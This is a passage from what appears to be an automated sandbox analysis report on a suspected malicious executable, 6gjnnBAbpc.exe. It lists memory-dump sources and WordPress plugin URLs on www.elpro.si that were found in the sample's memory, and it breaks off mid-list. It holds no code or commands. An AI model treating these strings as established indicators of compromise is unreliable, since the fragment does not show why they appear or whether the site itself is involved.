00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/js/sassy-social-share-public.js?ver
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/dist/css/blocks/styles.css?ver=4.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/res/flags/en.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/res/flags/sl.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/res/js/cookies/language-cookie.js?
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/taxonomy-images/css/style.css?ver=0.9.6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/css/cookie-law-info-gdpr
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/css/cookie-law-info-publ
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/js/cookie-law-info-publi
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce-multilingual/res/js/cart_widget.min.js?ver=5.1.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce-multilingual/res/js/front-scripts.min.js?ver=5.1.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=7.5.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 